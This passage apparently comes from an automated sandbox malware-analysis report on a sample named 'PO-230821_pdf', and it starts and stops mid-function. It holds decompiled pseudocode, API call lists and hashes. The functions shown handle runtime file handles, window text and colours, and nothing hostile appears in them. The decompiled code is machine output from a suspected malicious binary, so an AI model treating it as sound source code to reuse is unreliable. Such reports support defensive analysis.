                                            						if( *((short*)(_t155 - 0x42)) == 0) {
                                            							while(1) {
                                            								L31:
                                            								 *(_t155 - 0x2c) = _t130;
                                            								if(_t130 >= 3) {
                                            									break;
                                            								}
                                            								_t147 =  *0x1000db80 + (_t130 << 6);
                                            								 *(_t155 - 0x24) = _t147;
                                            								if( *_t147 == 0xffffffff ||  *_t147 == 0xfffffffe) {
                                            									_t147[1] = 0x81;
                                            									if(_t130 != 0) {
                                            										_t66 = _t130 - 1; // -1
                                            										asm("sbb eax, eax");
                                            										_t90 =  ~_t66 + 0xfffffff5;
                                            									} else {
                                            										_t90 = 0xfffffff6;
                                            									}
                                            									_t142 = GetStdHandle(_t90);
                                            									if(_t142 == 0xffffffff || _t142 == 0) {
                                            										L47:
                                            										_t147[1] = _t147[1] | 0x00000040;
                                            										 *_t147 = 0xfffffffe;
                                            										_t94 =  *0x1000cb40; // 0x0
                                            										if(_t94 != 0) {
                                            											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
                                            										}
                                            										goto L49;
                                            									} else {
                                            										_t98 = GetFileType(_t142);
                                            										if(_t98 == 0) {
                                            											goto L47;
                                            										}
                                            										 *_t147 = _t142;
                                            										_t99 = _t98 & 0x000000ff;
                                            										if(_t99 != 2) {
                                            											if(_t99 != 3) {
                                            												L46:
                                            												_t70 =  &(_t147[3]); // -268491636
                                            												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
                                            												_t147[2] = _t147[2] + 1;
                                            												goto L49;
                                            											}
                                            											_t103 = _t147[1] | 0x00000008;
                                            											L45:
                                            											_t147[1] = _t103;
                                            											goto L46;
                                            										}
                                            										_t103 = _t147[1] | 0x00000040;
                                            										goto L45;
                                            									}
                                            								} else {
                                            									_t147[1] = _t147[1] | 0x00000080;
                                            									L49:
                                            									_t130 = _t130 + 1;
                                            									continue;
                                            								}
                                            							}
                                            							 *(_t155 - 4) = 0xfffffffe;
                                            							E100021A8();
                                            							L2:
                                            							_t86 = 1;
                                            							L3:
                                            							return E10002885(_t86);
                                            						}
                                            						_t105 =  *((intOrPtr*)(_t155 - 0x40));
                                            						if(_t105 == 0) {
                                            							goto L31;
                                            						}
                                            						_t135 =  *_t105;
                                            						 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
                                            						_t106 = _t105 + 4;
                                            						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                                            						 *(_t155 - 0x20) = _t106 + _t135;
                                            						if(_t135 >= 0x800) {
                                            							_t135 = 0x800;
                                            							 *((intOrPtr*)(_t155 - 0x1c)) = 0x800;
                                            						}
                                            						_t149 = 1;
                                            						 *(_t155 - 0x30) = 1;
                                            						while( *0x1000db64 < _t135) {
                                            							_t138 = E10002720(_t141, 0x40);
                                            							 *(_t155 - 0x24) = _t138;
                                            							if(_t138 != 0) {
                                            								0x1000db80[_t149] = _t138;
                                            								 *0x1000db64 =  *0x1000db64 + _t141;
                                            								while(_t138 <  &(0x1000db80[_t149][0x200])) {
                                            									_t138[1] = 0xa00;
                                            									 *_t138 =  *_t138 | 0xffffffff;
                                            									_t138[2] = _t130;
                                            									_t138[9] = _t138[9] & 0x00000080;
                                            									_t138[9] = 0xa0a;
                                            									_t138[0xe] = _t130;
                                            									_t138[0xd] = _t130;
                                            									_t138 =  &(_t138[0x10]);
                                            									 *(_t155 - 0x24) = _t138;
                                            								}
                                            								_t149 = _t149 + 1;
                                            								 *(_t155 - 0x30) = _t149;
                                            								_t135 =  *((intOrPtr*)(_t155 - 0x1c));
                                            								continue;
                                            							}
                                            							_t135 =  *0x1000db64;
                                            							 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
                                            							break;
                                            						}
                                            						_t143 = _t130;
                                            						 *(_t155 - 0x2c) = _t143;
                                            						_t109 =  *((intOrPtr*)(_t155 - 0x28));
                                            						_t139 =  *(_t155 - 0x20);
                                            						while(_t143 < _t135) {
                                            							_t150 =  *_t139;
                                            							if(_t150 == 0xffffffff || _t150 == 0xfffffffe) {
                                            								L26:
                                            								_t143 = _t143 + 1;
                                            								 *(_t155 - 0x2c) = _t143;
                                            								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                                            								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                                            								_t139 =  &(_t139[1]);
                                            								 *(_t155 - 0x20) = _t139;
                                            								continue;
                                            							} else {
                                            								_t111 =  *_t109;
                                            								if((_t111 & 0x00000001) == 0) {
                                            									goto L26;
                                            								}
                                            								if((_t111 & 0x00000008) != 0) {
                                            									L24:
                                            									_t154 = 0x1000db80[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
                                            									 *(_t155 - 0x24) = _t154;
                                            									 *_t154 =  *_t139;
                                            									_t154[1] =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
                                            									_t38 =  &(_t154[3]); // 0xd
                                            									InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
                                            									_t154[2] = _t154[2] + 1;
                                            									_t139 =  *(_t155 - 0x20);
                                            									L25:
                                            									_t135 =  *((intOrPtr*)(_t155 - 0x1c));
                                            									goto L26;
                                            								}
                                            								_t119 = GetFileType(_t150);
                                            								_t139 =  *(_t155 - 0x20);
                                            								if(_t119 == 0) {
                                            									goto L25;
                                            								}
                                            								goto L24;
                                            							}
                                            						}
                                            						goto L31;
                                            					}
                                            					E100040A0(_t155, 0x1000be00, _t155 - 0x10, 0xfffffffe);
                                            					_t86 = 0;
                                            					goto L3;
                                            				}
                                            				E100040A0(_t155, 0x1000be00, _t155 - 0x10, 0xfffffffe);
                                            				goto L2;
                                            			}




























                                            0x10001ee4
                                            0x10001ee6
                                            0x10001eeb
                                            0x10001ef2
                                            0x10001ef8
                                            0x10001efa
                                            0x10001f03
                                            0x10001f23
                                            0x10001f27
                                            0x10001f28
                                            0x10001f29
                                            0x10001f30
                                            0x10001f32
                                            0x10001f37
                                            0x10001f50
                                            0x10001f55
                                            0x10001f5b
                                            0x10001f64
                                            0x10001f6a
                                            0x10001f6d
                                            0x10001f70
                                            0x10001f79
                                            0x10001f7c
                                            0x10001f82
                                            0x10001f85
                                            0x10001f88
                                            0x10001f8b
                                            0x10001f8e
                                            0x10001f8e
                                            0x10001f99
                                            0x10001fa4
                                            0x100020d3
                                            0x100020d3
                                            0x100020d3
                                            0x100020d9
                                            0x00000000
                                            0x00000000
                                            0x100020e4
                                            0x100020ea
                                            0x100020f0
                                            0x10002105
                                            0x1000210b
                                            0x10002112
                                            0x10002117
                                            0x10002119
                                            0x1000210d
                                            0x1000210f
                                            0x1000210f
                                            0x10002123
                                            0x10002128
                                            0x1000216f
                                            0x10002175
                                            0x10002178
                                            0x1000217e
                                            0x10002185
                                            0x1000218a
                                            0x1000218a
                                            0x00000000
                                            0x1000212e
                                            0x1000212f
                                            0x10002137
                                            0x00000000
                                            0x00000000
                                            0x10002139
                                            0x1000213b
                                            0x10002143
                                            0x10002150
                                            0x1000215b
                                            0x10002160
                                            0x10002164
                                            0x1000216a
                                            0x00000000
                                            0x1000216a
                                            0x10002156
                                            0x10002158
                                            0x10002158
                                            0x00000000
                                            0x10002158
                                            0x10002149
                                            0x00000000
                                            0x10002149
                                            0x100020f7
                                            0x100020fd
                                            0x10002191
                                            0x10002191
                                            0x00000000
                                            0x10002191
                                            0x100020f0
                                            0x10002197
                                            0x1000219e
                                            0x10001f18
                                            0x10001f1a
                                            0x10001f1b
                                            0x10001f20
                                            0x10001f20
                                            0x10001faa
                                            0x10001faf
                                            0x00000000
                                            0x00000000
                                            0x10001fb5
                                            0x10001fb7
                                            0x10001fba
                                            0x10001fbd
                                            0x10001fc2
                                            0x10001fcc
                                            0x10001fce
                                            0x10001fd0
                                            0x10001fd0
                                            0x10001fd5
                                            0x10001fd6
                                            0x10001fd9
                                            0x10001feb
                                            0x10001fed
                                            0x10001ff2
                                            0x10002086
                                            0x1000208d
                                            0x10002093
                                            0x100020a3
                                            0x100020a9
                                            0x100020ac
                                            0x100020af
                                            0x100020b3
                                            0x100020b9
                                            0x100020bc
                                            0x100020bf
                                            0x100020c2
                                            0x100020c2
                                            0x100020c7
                                            0x100020c8
                                            0x100020cb
                                            0x00000000
                                            0x100020cb
                                            0x10001ff8
                                            0x10001ffe
                                            0x00000000
                                            0x10001ffe
                                            0x10002001
                                            0x10002003
                                            0x10002006
                                            0x10002009
                                            0x1000200c
                                            0x10002014
                                            0x10002019
                                            0x10002073
                                            0x10002073
                                            0x10002074
                                            0x1000207a
                                            0x1000207b
                                            0x1000207e
                                            0x10002081
                                            0x00000000
                                            0x10002020
                                            0x10002020
                                            0x10002024
                                            0x00000000
                                            0x00000000
                                            0x10002028
                                            0x10002038
                                            0x10002045
                                            0x1000204c
                                            0x10002051
                                            0x10002058
                                            0x10002060
                                            0x10002064
                                            0x1000206a
                                            0x1000206d
                                            0x10002070
                                            0x10002070
                                            0x00000000
                                            0x10002070
                                            0x1000202b
                                            0x10002031
                                            0x10002036
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10002036
                                            0x10002019
                                            0x00000000
                                            0x1000200c
                                            0x10001f44
                                            0x10001f4c
                                            0x00000000
                                            0x10001f4c
                                            0x10001f10
                                            0x00000000

                                            APIs
                                            • __lock.LIBCMT ref: 10001EF2
                                              • Part of subcall function 10002A35: __mtinitlocknum.LIBCMT ref: 10002A47
                                              • Part of subcall function 10002A35: __amsg_exit.LIBCMT ref: 10002A53
                                              • Part of subcall function 10002A35: EnterCriticalSection.KERNEL32(?,?,10001820,0000000D,10009AF0,00000008,100018F1,?,00000001,?,100014AC,00000000,10009AB0,00000008,10001535,?), ref: 10002A60
                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 10001F10
                                            • __calloc_crt.LIBCMT ref: 10001F29
                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 10001F44
                                            • GetStartupInfoW.KERNEL32(?,10009B60,00000064), ref: 10001F99
                                            • __calloc_crt.LIBCMT ref: 10001FE4
                                            • GetFileType.KERNEL32(00000001), ref: 1000202B
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 10002064
                                            • GetStdHandle.KERNEL32(-000000F6), ref: 1000211D
                                            • GetFileType.KERNEL32(00000000), ref: 1000212F
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(-1000DB74,00000FA0), ref: 10002164
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
                                            • String ID:
                                            • API String ID: 301580142-0
                                            • Opcode ID: 2d8cac80f073dcc9dfd702bfd764e0811f6332412cd4bca8ba009bb46d97c60e
                                            • Instruction ID: fcfc70d86479900d935e8ce6fa034a8589cddd1e60d73967d9baabefcea3176b
                                            • Opcode Fuzzy Hash: 2d8cac80f073dcc9dfd702bfd764e0811f6332412cd4bca8ba009bb46d97c60e
                                            • Instruction Fuzzy Hash: 2491D170D05756CFEB10CF68C88059DBBF4EF093A4B21426ED5A6A729AD7349842CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004056CA(signed int _a4, WCHAR* _a8) {
                                            				struct HWND__* _v8;
                                            				signed int _v12;
                                            				WCHAR* _v32;
                                            				long _v44;
                                            				int _v48;
                                            				void* _v52;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				WCHAR* _t27;
                                            				signed int _t28;
                                            				long _t29;
                                            				signed int _t37;
                                            				signed int _t38;
                                            
                                            				_t27 =  *0x429244;
                                            				_v8 = _t27;
                                            				if(_t27 != 0) {
                                            					_t37 =  *0x42a314;
                                            					_v12 = _t37;
                                            					_t38 = _t37 & 0x00000001;
                                            					if(_t38 == 0) {
                                            						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
                                            					}
                                            					_t27 = lstrlenW(0x422728);
                                            					_a4 = _t27;
                                            					if(_a8 == 0) {
                                            						L6:
                                            						if((_v12 & 0x00000004) == 0) {
                                            							_t27 = SetWindowTextW( *0x429228, 0x422728);
                                            						}
                                            						if((_v12 & 0x00000002) == 0) {
                                            							_v32 = 0x422728;
                                            							_v52 = 1;
                                            							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                                            							_v44 = 0;
                                            							_v48 = _t29 - _t38;
                                            							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                                            							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                                            						}
                                            						if(_t38 != 0) {
                                            							_t28 = _a4;
                                            							0x422728[_t28] = 0;
                                            							return _t28;
                                            						}
                                            					} else {
                                            						_t27 = lstrlenW(_a8) + _a4;
                                            						if(_t27 < 0x1000) {
                                            							_t27 = lstrcatW(0x422728, _a8);
                                            							goto L6;
                                            						}
                                            					}
                                            				}
                                            				return _t27;
                                            			}

















                                            0x004056d0
                                            0x004056da
                                            0x004056df
                                            0x004056e5
                                            0x004056f0
                                            0x004056f3
                                            0x004056f6
                                            0x004056fc
                                            0x004056fc
                                            0x00405702
                                            0x0040570a
                                            0x0040570d
                                            0x0040572a
                                            0x0040572e
                                            0x00405737
                                            0x00405737
                                            0x00405741
                                            0x0040574a
                                            0x00405756
                                            0x0040575d
                                            0x00405761
                                            0x00405764
                                            0x00405777
                                            0x00405785
                                            0x00405785
                                            0x00405789
                                            0x0040578b
                                            0x0040578e
                                            0x00000000
                                            0x0040578e
                                            0x0040570f
                                            0x00405717
                                            0x0040571f
                                            0x00405725
                                            0x00000000
                                            0x00405725
                                            0x0040571f
                                            0x0040570d
                                            0x0040579a

                                            APIs
                                            • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                            • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                            • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                            • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                              • Part of subcall function 004066A5: lstrcatW.KERNEL32(Fosklcks,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                              • Part of subcall function 004066A5: lstrlenW.KERNEL32(Fosklcks,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                            • String ID: ('B
                                            • API String ID: 1495540970-2332581011
                                            • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                            • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                            • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                            • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E10007110(void* __eflags, signed int _a4) {
                                            				void* _t12;
                                            				signed int _t13;
                                            				signed int _t16;
                                            				intOrPtr _t18;
                                            				void* _t22;
                                            				signed int _t35;
                                            				long _t40;
                                            
                                            				_t13 = E10001EA9(_t12);
                                            				if(_t13 >= 0) {
                                            					_t35 = _a4;
                                            					if(E10006D9D(_t35) == 0xffffffff) {
                                            						L10:
                                            						_t40 = 0;
                                            					} else {
                                            						_t18 =  *0x1000db80;
                                            						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
                                            							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
                                            								goto L8;
                                            							} else {
                                            								goto L7;
                                            							}
                                            						} else {
                                            							L7:
                                            							_t22 = E10006D9D(2);
                                            							if(E10006D9D(1) == _t22) {
                                            								goto L10;
                                            							} else {
                                            								L8:
                                            								if(CloseHandle(E10006D9D(_t35)) != 0) {
                                            									goto L10;
                                            								} else {
                                            									_t40 = GetLastError();
                                            								}
                                            							}
                                            						}
                                            					}
                                            					E10006D17(_t35);
                                            					 *((char*)( *((intOrPtr*)(0x1000db80 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
                                            					if(_t40 == 0) {
                                            						_t16 = 0;
                                            					} else {
                                            						_t16 = E10003A46(_t40) | 0xffffffff;
                                            					}
                                            					return _t16;
                                            				} else {
                                            					return _t13 | 0xffffffff;
                                            				}
                                            			}










                                            0x10007113
                                            0x1000711a
                                            0x10007123
                                            0x10007130
                                            0x10007182
                                            0x10007182
                                            0x10007132
                                            0x10007132
                                            0x1000713a
                                            0x10007148
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10007150
                                            0x10007150
                                            0x10007152
                                            0x10007164
                                            0x00000000
                                            0x10007166
                                            0x10007166
                                            0x10007176
                                            0x00000000
                                            0x10007178
                                            0x1000717e
                                            0x1000717e
                                            0x10007176
                                            0x10007164
                                            0x1000713a
                                            0x10007185
                                            0x1000719d
                                            0x100071a4
                                            0x100071b2
                                            0x100071a6
                                            0x100071ad
                                            0x100071ad
                                            0x100071b7
                                            0x1000711c
                                            0x10007120
                                            0x10007120

                                            APIs
                                            • __ioinit.LIBCMT ref: 10007113
                                              • Part of subcall function 10001EA9: InitOnceExecuteOnce.KERNEL32(1000BF04,10001EE4,00000000,00000000,100059D6), ref: 10001EB7
                                            • __get_osfhandle.LIBCMT ref: 10007127
                                            • __get_osfhandle.LIBCMT ref: 10007152
                                            • __get_osfhandle.LIBCMT ref: 1000715B
                                            • __get_osfhandle.LIBCMT ref: 10007167
                                            • CloseHandle.KERNEL32(00000000,?,?,?,100070BB,?,10009D68,00000010,10006BBF,00000000,?,?,?), ref: 1000716E
                                            • GetLastError.KERNEL32(?,100070BB,?,10009D68,00000010,10006BBF,00000000,?,?,?), ref: 10007178
                                            • __free_osfhnd.LIBCMT ref: 10007185
                                            • __dosmaperr.LIBCMT ref: 100071A7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                                            • String ID:
                                            • API String ID: 974577687-0
                                            • Opcode ID: ce2959535f6860cfffb36d560c733367f544dfd2515bb58f4928e8f84eb54c83
                                            • Instruction ID: 4e5b2bc2a83de6c9835be33e44e299ab5093b7e25435b5d975fa46d8298bb269
                                            • Opcode Fuzzy Hash: ce2959535f6860cfffb36d560c733367f544dfd2515bb58f4928e8f84eb54c83
                                            • Instruction Fuzzy Hash: 0211E932E0566025F255D77C5C45BAE378BFF417F4F22024AF82C8B1DEDF68A8418161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                            				struct tagLOGBRUSH _v16;
                                            				long _t39;
                                            				long _t41;
                                            				void* _t44;
                                            				signed char _t50;
                                            				long* _t54;
                                            
                                            				if(_a4 + 0xfffffecd > 5) {
                                            					L18:
                                            					return 0;
                                            				}
                                            				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                            				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                            					goto L18;
                                            				} else {
                                            					_t50 = _t54[5];
                                            					if((_t50 & 0xffffffe0) != 0) {
                                            						goto L18;
                                            					}
                                            					_t39 =  *_t54;
                                            					if((_t50 & 0x00000002) != 0) {
                                            						_t39 = GetSysColor(_t39);
                                            					}
                                            					if((_t54[5] & 0x00000001) != 0) {
                                            						SetTextColor(_a8, _t39);
                                            					}
                                            					SetBkMode(_a8, _t54[4]);
                                            					_t41 = _t54[1];
                                            					_v16.lbColor = _t41;
                                            					if((_t54[5] & 0x00000008) != 0) {
                                            						_t41 = GetSysColor(_t41);
                                            						_v16.lbColor = _t41;
                                            					}
                                            					if((_t54[5] & 0x00000004) != 0) {
                                            						SetBkColor(_a8, _t41);
                                            					}
                                            					if((_t54[5] & 0x00000010) != 0) {
                                            						_v16.lbStyle = _t54[2];
                                            						_t44 = _t54[3];
                                            						if(_t44 != 0) {
                                            							DeleteObject(_t44);
                                            						}
                                            						_t54[3] = CreateBrushIndirect( &_v16);
                                            					}
                                            					return _t54[3];
                                            				}
                                            			}









                                            0x0040463d
                                            0x004046f3
                                            0x00000000
                                            0x004046f3
                                            0x0040464e
                                            0x00404652
                                            0x00000000
                                            0x0040466c
                                            0x0040466c
                                            0x00404675
                                            0x00000000
                                            0x00000000
                                            0x00404677
                                            0x00404683
                                            0x00404686
                                            0x00404686
                                            0x0040468c
                                            0x00404692
                                            0x00404692
                                            0x0040469e
                                            0x004046a4
                                            0x004046ab
                                            0x004046ae
                                            0x004046b1
                                            0x004046b3
                                            0x004046b3
                                            0x004046bb
                                            0x004046c1
                                            0x004046c1
                                            0x004046cb
                                            0x004046d0
                                            0x004046d3
                                            0x004046d8
                                            0x004046db
                                            0x004046db
                                            0x004046eb
                                            0x004046eb
                                            0x00000000
                                            0x004046ee

                                            APIs
                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                            • GetSysColor.USER32(00000000), ref: 00404686
                                            • SetTextColor.GDI32(?,00000000), ref: 00404692
                                            • SetBkMode.GDI32(?,?), ref: 0040469E
                                            • GetSysColor.USER32(?), ref: 004046B1
                                            • SetBkColor.GDI32(?,?), ref: 004046C1
                                            • DeleteObject.GDI32(?), ref: 004046DB
                                            • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                            • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                            • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 87%
                                            			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                            				intOrPtr _t65;
                                            				intOrPtr _t66;
                                            				intOrPtr _t72;
                                            				void* _t76;
                                            				void* _t79;
                                            
                                            				_t72 = __edx;
                                            				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                            				_t65 = 2;
                                            				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                            				_t66 = E00402D84(_t65);
                                            				_t79 = _t66 - 1;
                                            				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                            				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                            				if(_t79 < 0) {
                                            					L36:
                                            					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
                                            				} else {
                                            					__ecx = 0x3ff;
                                            					if(__eax > 0x3ff) {
                                            						 *(__ebp - 0x44) = 0x3ff;
                                            					}
                                            					if( *__edi == __bx) {
                                            						L34:
                                            						__ecx =  *(__ebp - 0xc);
                                            						__eax =  *(__ebp - 8);
                                            						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                            						if(_t79 == 0) {
                                            							 *(_t76 - 4) = 1;
                                            						}
                                            						goto L36;
                                            					} else {
                                            						 *(__ebp - 0x38) = __ebx;
                                            						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
                                            						if( *(__ebp - 0x44) > __ebx) {
                                            							do {
                                            								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                            									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
                                            										__eax = __ebp - 0x50;
                                            										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                            											goto L34;
                                            										} else {
                                            											goto L21;
                                            										}
                                            									} else {
                                            										goto L34;
                                            									}
                                            								} else {
                                            									__eax = __ebp - 0x40;
                                            									_push(__ebx);
                                            									_push(__ebp - 0x40);
                                            									__eax = 2;
                                            									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                            									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                            									if(__eax == 0) {
                                            										goto L34;
                                            									} else {
                                            										__ecx =  *(__ebp - 0x40);
                                            										if(__ecx == __ebx) {
                                            											goto L34;
                                            										} else {
                                            											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                            											 *(__ebp - 0x4c) = __ecx;
                                            											 *(__ebp - 0x50) = __eax;
                                            											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                            												L28:
                                            												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
                                            											} else {
                                            												__ebp - 0x50 = __ebp + 0xa;
                                            												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                            													L21:
                                            													__eax =  *(__ebp - 0x50);
                                            												} else {
                                            													__edi =  *(__ebp - 0x4c);
                                            													__edi =  ~( *(__ebp - 0x4c));
                                            													while(1) {
                                            														_t22 = __ebp - 0x40;
                                            														 *_t22 =  *(__ebp - 0x40) - 1;
                                            														__eax = 0xfffd;
                                            														 *(__ebp - 0x50) = 0xfffd;
                                            														if( *_t22 == 0) {
                                            															goto L22;
                                            														}
                                            														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                            														__edi = __edi + 1;
                                            														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                            														__eax = __ebp + 0xa;
                                            														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                            															continue;
                                            														} else {
                                            															goto L21;
                                            														}
                                            														goto L22;
                                            													}
                                            												}
                                            												L22:
                                            												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                            													goto L28;
                                            												} else {
                                            													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
